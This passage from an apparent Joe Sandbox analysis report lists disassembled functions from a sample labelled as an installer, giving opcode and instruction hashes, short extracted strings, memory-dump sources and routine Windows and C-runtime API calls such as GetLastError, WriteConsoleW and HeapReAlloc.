                            • Opcode Fuzzy Hash: e7583522c6b9a1174f2957c684c7bd019576d9283619ae17b977aec67f370ed9
                            • Instruction Fuzzy Hash: EF01D832710515ABDB05CF9ACC45C9D7B3DEBC6334B29C24DE921ABA80FA71D9518790
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: <J$DJ$HJ$TJ$]
                            • API String ID: 0-686860805
                            • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction ID: db3991890b8eb7420937ae2b68d147dce35d1fed8ff22d95fcda7afef35667b3
                            • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction Fuzzy Hash: E4418675C06289ABCF14DBA1D4908EFBB70AF1130CB24856ED02167E50FB35EA4DCBA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction ID: 24249c9591bd23ec9d9d171ddc395da68580f6000aaa88372e4a8d05e4e4d8e0
                            • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction Fuzzy Hash: D2118176641308BFEB218FA5CC40EAB7FB9EBC9748F008419B245566A0D6B1AC049730
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6CC4BB43), ref: 6CC480A7
                            • _free.LIBCMT ref: 6CC48104
                            • _free.LIBCMT ref: 6CC4813A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC48145
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 443318c4197a09c7a2b722d4c5b77fb22058bac6a15a3e506f09ea207ab9be92
                            • Instruction ID: eba8e9abbdaa193434ec353e6ac18b6849463b379017e123ff99f38fab75de2b
                            • Opcode Fuzzy Hash: 443318c4197a09c7a2b722d4c5b77fb22058bac6a15a3e506f09ea207ab9be92
                            • Instruction Fuzzy Hash: 0B11EC31704601AFEA211A758C84D6B2279BBC37BD725C637F628D6AC0FF218C066350
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6CC57DDC,00000000,00000000,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0), ref: 6CC595C1
                            • GetLastError.KERNEL32(?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?,6CC4E7C0,?,6CC4F40C,6CC591A6), ref: 6CC595CD
                              • Part of subcall function 6CC5961E: CloseHandle.KERNEL32(FFFFFFFE,6CC595DD,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?,6CC4E7C0), ref: 6CC5962E
                            • ___initconout.LIBCMT ref: 6CC595DD
                              • Part of subcall function 6CC595FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC5959B,6CC5822E,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?), ref: 6CC59612
                            • WriteConsoleW.KERNEL32(00000000,?,6CC57DDC,00000000,?,6CC58241,00000000,00000001,00000000,6CC4E7C0,?,6CC4F976,?,?,6CC4E7C0,?), ref: 6CC595F2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 448f88e10babc1b4070a73b6f1d9894825deb07ec197f34e43bad4d9783685f8
                            • Instruction ID: 00072caaabfb86d3e1843a814c46b8b3d0f14349f51581701f6606159fb37b1e
                            • Opcode Fuzzy Hash: 448f88e10babc1b4070a73b6f1d9894825deb07ec197f34e43bad4d9783685f8
                            • Instruction Fuzzy Hash: 76F03076600118BBCF221F92CC4499D3F76FF0A7B5B444590FA0A95664EB32C871EB95
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC71077
                              • Part of subcall function 6CC70FF5: __EH_prolog.LIBCMT ref: 6CC70FFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :$\
                            • API String ID: 3519838083-1166558509
                            • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction ID: 642d756a142dc8544bc5b304e9fa9dcf6cdd82dad594c8552914f06b9b937ba0
                            • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction Fuzzy Hash: ECE1D2709002459ACF24DFA9C5A07EDB7B1FF1531CF108119D85AABE90FB75E649CB21
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aullrem
                            • String ID: d%K
                            • API String ID: 3415659256-3110269457
                            • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction ID: 749cf4bfb50cd8b8b7ed30cf96cb0ad6fec851e96fe02be876209d5e703a13dd
                            • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction Fuzzy Hash: 1981C2B1A002199FDF00CF98C590BDEB7F5AF4535DF248069D818BBA49E771E909CBA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 971eda649d2dcf1b1725d2ea54369247f72aebed579a392e234311111a486c40
                            • Instruction ID: 843ae94f6f6225754e82574b118dd1e0130033b2c430be7e18f23034a57f3793
                            • Opcode Fuzzy Hash: 971eda649d2dcf1b1725d2ea54369247f72aebed579a392e234311111a486c40
                            • Instruction Fuzzy Hash: 5C71B571D45E169BEB108F95C880AEE7BB5FF45318F24C229E820E7A48FB75C985C760
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$hfJ
                            • API String ID: 3519838083-1391159562
                            • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction ID: e0fbecff17856498986e095169bb148229050e46211f3f50e88e06500bcd8375
                            • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction Fuzzy Hash: 8E914771910608DFCB10DFA9C8909DEFBB4FF19308F54456EE056E7A90E770AA48CB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC8BC5D
                              • Part of subcall function 6CC8A61A: __EH_prolog.LIBCMT ref: 6CC8A61F
                              • Part of subcall function 6CC8AA2E: __EH_prolog.LIBCMT ref: 6CC8AA33
                              • Part of subcall function 6CC8BEA5: __EH_prolog.LIBCMT ref: 6CC8BEAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: a60e8d51c1fedd4886fdd55b54804f5b15b999714123d8c932266ba882d03638
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: 90819231D01159DFCF15DFA8C990ADEBBB4AF19318F10409AE51277BA0EB34AE49CB60
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CB02A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: cd15c5ac5149c876a2fb10845719cf5796873d312bcf362b386de7e5439725c4
                            • Instruction ID: c8f4c4b146943840010e380707013181001a2fe2bead1d04a8dce6381d515999
                            • Opcode Fuzzy Hash: cd15c5ac5149c876a2fb10845719cf5796873d312bcf362b386de7e5439725c4
                            • Instruction Fuzzy Hash: D35122B1A00244CFCB10CF68D885A9EBBB5EF89304F14856EE849DB741E735D999CB92
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: <dJ$Q
                            • API String ID: 3519838083-2252229148
                            • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction ID: bec8d1885abca444fcf320d9843d45e8ee9ebcbda5b2cf56472ecc132ce1608f
                            • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                            • Instruction Fuzzy Hash: 02518171904249EFCF01DFD9C9808EDB7B1FF48318F18852DE515ABA50E7319A8ACB51
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $D^J
                            • API String ID: 3519838083-3977321784
                            • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction ID: a881ae4fa284b53d52912c2d2c0d5374c215a347b13b76126cc6ec2f77a01da3
                            • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                            • Instruction Fuzzy Hash: F8412C28A075A06EDB269F29C4907FBBFA1AF1760CF14815DC49207EC1FB6859CAC7D4
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC57DC6), ref: 6CC5070B
                            • __dosmaperr.LIBCMT ref: 6CC50712
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: fe94687a93007a4df33bac2fdc094786255ba516f63f6d19503c3a3413849693
                            • Instruction ID: ce91fa115c6f968e71bfad82f60c11008b1edfefc0bc860699c67ebde09277bf
                            • Opcode Fuzzy Hash: fe94687a93007a4df33bac2fdc094786255ba516f63f6d19503c3a3413849693
                            • Instruction Fuzzy Hash: 5B4158716045D4AFD7118F19C880BA97FA9EB8635CF988259EC84CB682F771D832CB94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: X&L$p|J
                            • API String ID: 3519838083-2944591232
                            • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction ID: 0e66f38c2c57b06926bfeeb9d0624a238531600fbd53489e1f3bc09b5d10fc9d
                            • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                            • Instruction Fuzzy Hash: D13126316859878BDB009BD9D94DFB97B71FB11728F200227D500E2EA2FB6089878B50
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 3324150d2f267dca043469d17f9394a6bb598250aa7d12a09fe2518c526e1260
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: A8419F31A01786EFCF119FA5C5946FEBBE2FF45308F00446EE05A97A50EB31690ADB91
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID: 3333
                            • API String ID: 3732870572-2924271548
                            • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction ID: 24c6b89a09c63e2b3e724a369c529997bc632292c9f02ab9d113b5787a1aba16
                            • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                            • Instruction Fuzzy Hash: DA2194B0E007046ED720CFB98884A5BFAFCEB84755F10896EE186D7A40D770A9458B65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: d90379db6d71bc226563e245a5d55c0a70f4a5e57aa491bfd6c729942faffb2b
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: CD01AD72E0130ADACB10CFE984945AEFBB4FF59304F44842EE029E3A40D3349905CBA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$xMJ
                            • API String ID: 3519838083-951924499
                            • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction ID: 85ffc0d653bc3122abe9fa53e1cc77557e089f2ea586152b2e13096c07e4f1b3
                            • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                            • Instruction Fuzzy Hash: 41112A71A01209DFCB10CFA9C49059EB7B5FF58348F90C46ED469E7650E3349A45CBA5
                            APIs
                            • _free.LIBCMT ref: 6CC51439
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC4DD2A,?,00000004,?,4B42FCB6,?,?,6CC42E7C,4B42FCB6,?), ref: 6CC51475
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 7743e3beb0c915530d23d59bd3b9366eaaf33bc5694315126c004cbe4945b96e
                            • Instruction ID: b8aea5c597c183382ea0eb42e3907098c2ec4efeb6bc0a11822f67343dedddd3
                            • Opcode Fuzzy Hash: 7743e3beb0c915530d23d59bd3b9366eaaf33bc5694315126c004cbe4945b96e
                            • Instruction Fuzzy Hash: FEF0C8316011116A9B111E2F9C48B9B3778AFC3BB9B95D115E81596E80FB20D435C199
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: |zJ
                            • API String ID: 3037903784-3782439380
                            • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction ID: 6cd44658c45dd86c661c3b4f902c41fe315ebf87cff0d06755ada57015a8fba9
                            • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                            • Instruction Fuzzy Hash: B1E0ED32A01A22AFEB04CF8DC808BDEF3A8FF54B18F10401F9012E3E40DBB0A8418681
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prologctype
                            • String ID: <oJ
                            • API String ID: 3037903784-2791053824
                            • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction ID: e882d7b90152b9b3b722eb1e5e764bacc1b741634ef877cd6d30807a10575252
                            • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                            • Instruction Fuzzy Hash: 47E06D72A155109BDB049F4DD810BDEF7B9EF55B24F11411FA021A7B51DBB5E800C694
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @ K$DJ$T)K$X/K
                            • API String ID: 0-3815299647
                            • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction ID: 6e48bec2dc61f67f10bf3e00b570b653302c7c31ab5eb190082e8a88f9a322a6
                            • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                            • Instruction Fuzzy Hash: 3B91C2306043059BCF24EE65C5B87EAB3A2AF4130CF124419CA655BF81FB75BD4AC761
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
